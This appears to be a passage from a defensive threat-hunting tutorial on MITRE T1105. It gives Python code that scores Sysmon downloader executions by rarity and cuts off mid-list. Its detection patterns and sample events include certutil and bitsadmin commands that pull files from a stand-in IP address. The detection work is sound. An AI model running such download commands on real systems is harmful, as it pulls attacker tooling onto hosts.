After initial access, attackers almost always need to pull more tooling onto the host: a beacon, a credential dumper, a tunneler. That step is Ingress Tool Transfer (T1105) in MITRE ATT&CK, and it is hard to catch with signatures because the transfer mechanisms are legitimate. certutil, bitsadmin, curl, and PowerShell all download files for normal reasons. The signal is in the combination and the rarity, not the binary itself.

This is where a little data science beats another detection rule. Here is how to hunt T1105 in Python across three layers: the process command line, the process-to-network relationship, and the payload on the wire.
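As an added example (not the author's code), here is the first of those layers, the process command line, done in Python over Sysmon Event ID 1 records: it flags the four download utilities named above and ranks each hit by how rare the host/parent/child combination is in the dataset, so a routine build-server curl job sinks while an Office process spawning certutil floats to the top. The event records, hosts, paths and URLs are constructed for the example.

```python
import re
from collections import Counter

# Command-line patterns of download-capable utilities abused for T1105 (the page's
# certutil, bitsadmin, curl and PowerShell cases), matched case-insensitively.
DOWNLOAD_PATTERNS = {
    "certutil": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I),
    "bitsadmin": re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer", re.I),
    "powershell": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile", re.I),
    "curl": re.compile(r"\bcurl(\.exe)?\b.*\s-(?:[oO]|-output)\b", re.I),
}
# Parents that rarely have a legitimate reason to spawn a downloader.
SUSPICIOUS_PARENTS = ("winword", "excel", "outlook", "wscript", "mshta")

# Constructed Sysmon Event ID 1 records (hypothetical hosts/paths; four identical curl runs model a routine build job).
SAMPLE_EVENTS = [
    {"host": "build01", "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Tools\curl.exe",
     "command_line": "curl.exe -o deps.zip https://mirror.example.internal/deps.zip"},
] * 4 + [
    {"host": "ws07", "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil.exe -urlcache -split -f http://203.0.113.5/u.txt C:\Users\Public\u.txt"},
    {"host": "ws07", "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
    {"host": "ws12", "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer job /download http://203.0.113.5/b.dat C:\Temp\b.dat"},
]

def download_tool(command_line):
    """Return the name of the download utility a command line invokes, or None."""
    return next((n for n, p in DOWNLOAD_PATTERNS.items() if p.search(command_line)), None)

def score_events(events):
    """Score downloader executions by rarity of the (host, parent, child) pair,
    doubled when the parent is an Office or script host. Highest score first."""
    pair_counts = Counter((e["host"], e["parent_image"].lower(), e["image"].lower()) for e in events)
    hits = []
    for e in events:
        tool = download_tool(e["command_line"])
        if tool is None:
            continue
        # A pair seen once scores 1.0; a pair repeated across the dataset decays toward 0.
        rarity = 1.0 / pair_counts[(e["host"], e["parent_image"].lower(), e["image"].lower())]
        parent = e["parent_image"].lower().rsplit("\\", 1)[-1]
        boost = 2.0 if any(p in parent for p in SUSPICIOUS_PARENTS) else 1.0
        hits.append({"host": e["host"], "tool": tool, "parent": parent, "score": rarity * boost})
    return sorted(hits, key=lambda h: h["score"], reverse=True)

if __name__ == "__main__":
    for hit in score_events(SAMPLE_EVENTS):
        print(f"{hit['score']:.2f}  {hit['host']:8} {hit['parent']:>12} -> {hit['tool']}")
```

Rarity is computed against whatever window of events you feed in, so run it over a baseline of days, not minutes, or every first-seen pair will score 1.0.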

Where T1105 Shows Up in Your Logs

Three sources cover most of it:

Sysmon Event ID 1 (process creation) for the download command line and parent process